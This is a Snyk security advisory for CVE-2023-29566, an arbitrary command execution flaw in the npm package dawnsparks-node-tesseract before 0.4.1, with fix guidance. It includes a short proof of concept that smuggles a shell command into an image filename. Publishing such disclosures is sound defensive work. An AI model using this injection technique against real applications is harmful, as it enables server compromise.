Arbitrary Code Execution Affecting dawnsparks-node-tesseract package, versions <0.4.1
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-DAWNSPARKSNODETESSERACT-5458970
- published 25 Apr 2023
- disclosed 24 Apr 2023
- credit Unknown
Introduced: 24 Apr 2023
CVE-2023-29566 Open this link in a new tabHow to fix?
Upgrade dawnsparks-node-tesseract to version 0.4.1 or higher.
Overview
dawnsparks-node-tesseract is an A fork of a simple wrapper for the Tesseract OCR package
Affected versions of this package are vulnerable to Arbitrary Code Execution via the child_process function due to improper input sanitization.
To exploit this vulnerability, a user must submit an image file to a Node.js application that is using "dawnsparks-node-tesseract" as a dependency to perform optical character recognition. If the user's submitted image filename contains shell commands, those will be evaluated, allowing the user to execute arbitrary commands on the application's server.
PoC
var PUT = require('dawnsparks-node-tesseract');
var user_image_filename = "; touch success;#";
try {
new PUT.process(user_image_filename,{},function(){});
} catch (e) {
console.log(e);
}